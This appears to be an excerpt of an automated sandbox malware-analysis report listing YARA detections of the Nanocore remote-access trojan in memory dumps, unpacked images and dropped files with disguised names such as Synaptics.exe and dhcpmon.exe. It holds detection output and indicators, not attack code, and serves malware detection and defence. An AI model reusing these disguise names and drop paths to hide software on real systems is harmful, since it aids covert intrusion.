            Source: Yara matchFile source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.401697054.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 5268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 4844, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_y8kdmHi6x3.exe PID: 6232, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: SYSTEM32.EXE PID: 6952, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4928, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6632, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5976, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\Desktop\SYSTEM32.EXE, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, type: DROPPED
            Source: Yara matchFile source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_Synaptics.exe, type: DROPPED

            Stealing of Sensitive Information

            barindex
            Yara detected Nanocore RAT
            Source: Yara matchFile source: 11.0.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.584130.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.0.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.29.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.584130.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4dba750.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.59e0000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.17.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.584130.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.46231f5.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.584130.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.32.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.27.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.44fa750.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.29.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3be31f5.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.584130.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cbff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.4619d96.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cb40a4.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.461ebcc.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.584130.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3bd9d96.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.45da750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.33.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.59e0000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.4379d96.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.18.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.43831f5.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.45da750.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.59e4629.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.32.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.461ebcc.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4bba750.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000000.406005434.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000000.430706138.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.412834234.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000000.415586772.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000000.356343368.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.439856260.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.561753594.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.329629304.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.460036376.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.441301976.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000000.439738650.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.417653653.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.381330192.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.558823372.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.441431426.0000000003711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.400361614.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000000.400197509.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000000.334103669.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.376096056.0000000004331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.436004480.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.459917090.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.406913050.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.374769254.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.459034432.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.441940953.0000000004711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.440103209.0000000003F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.375988189.0000000003331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.381281938.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.439646112.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.405483096.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 5268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 4844, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_y8kdmHi6x3.exe PID: 6232, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WINDOWS.EXE PID: 7016, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6580, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4928, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6632, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6692, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5244, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5976, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, type: DROPPED
            Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\WINDOWS.EXE, type: DROPPED
            Source: Yara matchFile source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_Synaptics.exe, type: DROPPED

            Remote Access Functionality

            barindex
            Detected Nanocore Rat
            Source: y8kdmHi6x3.exe, 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: y8kdmHi6x3.exe, 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: ._cache_y8kdmHi6x3.exe, 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: Synaptics.exe, 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: WINDOWS.EXE, 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: ._cache_WINDOWS.EXE, 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: ._cache_WINDOWS.EXE, 0000000B.00000002.561753594.0000000003BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
